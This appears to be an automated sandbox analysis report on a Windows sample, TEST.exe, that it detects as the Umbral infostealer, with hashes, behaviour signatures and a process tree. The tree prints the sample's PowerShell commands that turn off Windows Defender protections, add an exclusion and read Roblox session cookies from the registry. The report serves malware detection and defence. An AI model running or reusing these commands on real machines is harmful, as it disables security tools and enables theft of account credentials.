Analysis
-
max time kernel
1565s -
max time network
1567s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
07-06-2024 19:22
Behavioral task
behavioral1
Sample
TEST.exe
Resource
win7-20240215-en
General
-
Target
TEST.exe
-
Size
229KB
-
MD5
9dc985d83754309760ae45747d8081c2
-
SHA1
b60e1c39ee8da20c5bdf1df501fab12fd45eaf50
-
SHA256
f3fdf0137c30af49a71a174e204795a0b96ef2a8a0a53fda4add34574f79005b
-
SHA512
d0908c5e493bd83cd58e73b715c9318cb6032bb388d7c6ffbdc75b4bb813e594153a57e2ecebbe0a2d1aa0513312be16886b08ad8b91fc590217838057a730cf
-
SSDEEP
6144:tloZM+rIkd8g+EtXHkv/iD4hYBSGELnsmd42X3WVzb8e1mzi:voZtL+EP8hYBSGELnsmd42X3WtB
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2952-1-0x0000000000BA0000-0x0000000000BE0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1736 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts TEST.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2828 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1736 powershell.exe 1284 powershell.exe 2484 powershell.exe 3004 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2952 TEST.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeIncreaseQuotaPrivilege 2988 wmic.exe Token: SeSecurityPrivilege 2988 wmic.exe Token: SeTakeOwnershipPrivilege 2988 wmic.exe Token: SeLoadDriverPrivilege 2988 wmic.exe Token: SeSystemProfilePrivilege 2988 wmic.exe Token: SeSystemtimePrivilege 2988 wmic.exe Token: SeProfSingleProcessPrivilege 2988 wmic.exe Token: SeIncBasePriorityPrivilege 2988 wmic.exe Token: SeCreatePagefilePrivilege 2988 wmic.exe Token: SeBackupPrivilege 2988 wmic.exe Token: SeRestorePrivilege 2988 wmic.exe Token: SeShutdownPrivilege 2988 wmic.exe Token: SeDebugPrivilege 2988 wmic.exe Token: SeSystemEnvironmentPrivilege 2988 wmic.exe Token: SeRemoteShutdownPrivilege 2988 wmic.exe Token: SeUndockPrivilege 2988 wmic.exe Token: SeManageVolumePrivilege 2988 wmic.exe Token: 33 2988 wmic.exe Token: 34 2988 wmic.exe Token: 35 2988 wmic.exe Token: SeIncreaseQuotaPrivilege 2988 wmic.exe Token: SeSecurityPrivilege 2988 wmic.exe Token: SeTakeOwnershipPrivilege 2988 wmic.exe Token: SeLoadDriverPrivilege 2988 wmic.exe Token: SeSystemProfilePrivilege 2988 wmic.exe Token: SeSystemtimePrivilege 2988 wmic.exe Token: SeProfSingleProcessPrivilege 2988 wmic.exe Token: SeIncBasePriorityPrivilege 2988 wmic.exe Token: SeCreatePagefilePrivilege 2988 wmic.exe Token: SeBackupPrivilege 2988 wmic.exe Token: SeRestorePrivilege 2988 wmic.exe Token: SeShutdownPrivilege 2988 wmic.exe Token: SeDebugPrivilege 2988 wmic.exe Token: SeSystemEnvironmentPrivilege 2988 wmic.exe Token: SeRemoteShutdownPrivilege 2988 wmic.exe Token: SeUndockPrivilege 2988 wmic.exe Token: SeManageVolumePrivilege 2988 wmic.exe Token: 33 2988 wmic.exe Token: 34 2988 wmic.exe Token: 35 2988 wmic.exe Token: SeIncreaseQuotaPrivilege 1748 wmic.exe Token: SeSecurityPrivilege 1748 wmic.exe Token: SeTakeOwnershipPrivilege 1748 wmic.exe Token: SeLoadDriverPrivilege 1748 wmic.exe Token: SeSystemProfilePrivilege 1748 wmic.exe Token: SeSystemtimePrivilege 1748 wmic.exe Token: SeProfSingleProcessPrivilege 1748 wmic.exe Token: SeIncBasePriorityPrivilege 1748 wmic.exe Token: SeCreatePagefilePrivilege 1748 wmic.exe Token: SeBackupPrivilege 1748 wmic.exe Token: SeRestorePrivilege 1748 wmic.exe Token: SeShutdownPrivilege 1748 wmic.exe Token: SeDebugPrivilege 1748 wmic.exe Token: SeSystemEnvironmentPrivilege 1748 wmic.exe Token: SeRemoteShutdownPrivilege 1748 wmic.exe Token: SeUndockPrivilege 1748 wmic.exe Token: SeManageVolumePrivilege 1748 wmic.exe Token: 33 1748 wmic.exe Token: 34 1748 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2952 wrote to memory of 1736 2952 TEST.exe 28 PID 2952 wrote to memory of 1736 2952 TEST.exe 28 PID 2952 wrote to memory of 1736 2952 TEST.exe 28 PID 2952 wrote to memory of 1284 2952 TEST.exe 30 PID 2952 wrote to memory of 1284 2952 TEST.exe 30 PID 2952 wrote to memory of 1284 2952 TEST.exe 30 PID 2952 wrote to memory of 2484 2952 TEST.exe 32 PID 2952 wrote to memory of 2484 2952 TEST.exe 32 PID 2952 wrote to memory of 2484 2952 TEST.exe 32 PID 2952 wrote to memory of 3004 2952 TEST.exe 34 PID 2952 wrote to memory of 3004 2952 TEST.exe 34 PID 2952 wrote to memory of 3004 2952 TEST.exe 34 PID 2952 wrote to memory of 2988 2952 TEST.exe 36 PID 2952 wrote to memory of 2988 2952 TEST.exe 36 PID 2952 wrote to memory of 2988 2952 TEST.exe 36 PID 2952 wrote to memory of 1748 2952 TEST.exe 39 PID 2952 wrote to memory of 1748 2952 TEST.exe 39 PID 2952 wrote to memory of 1748 2952 TEST.exe 39 PID 2952 wrote to memory of 2424 2952 TEST.exe 41 PID 2952 wrote to memory of 2424 2952 TEST.exe 41 PID 2952 wrote to memory of 2424 2952 TEST.exe 41 PID 2952 wrote to memory of 2772 2952 TEST.exe 43 PID 2952 wrote to memory of 2772 2952 TEST.exe 43 PID 2952 wrote to memory of 2772 2952 TEST.exe 43 PID 2952 wrote to memory of 2828 2952 TEST.exe 45 PID 2952 wrote to memory of 2828 2952 TEST.exe 45 PID 2952 wrote to memory of 2828 2952 TEST.exe 45
Processes
-
C:\Users\Admin\AppData\Local\Temp\TEST.exe"C:\Users\Admin\AppData\Local\Temp\TEST.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TEST.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2828
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DGZQ2Y6PYIYSZ92PJIC.temp
Filesize7KB
MD5d96f8f282a204615d3e05e1ea32c6b54
SHA1502838561e7452c4fd62320b7e48954670b2f247
SHA256ca8c5d9dd9d54c688e7b3fc6e8a79710ded88fe2eb7e3098b32c562fde7c2969
SHA512a99b96fc32d52d8bfae92706e4dc2e691401d9aff805520f7a3d05d87947f8f4322c0ab2cd100c31fd5827eff55da34b3983a7b83c3bc5f57551df386b910507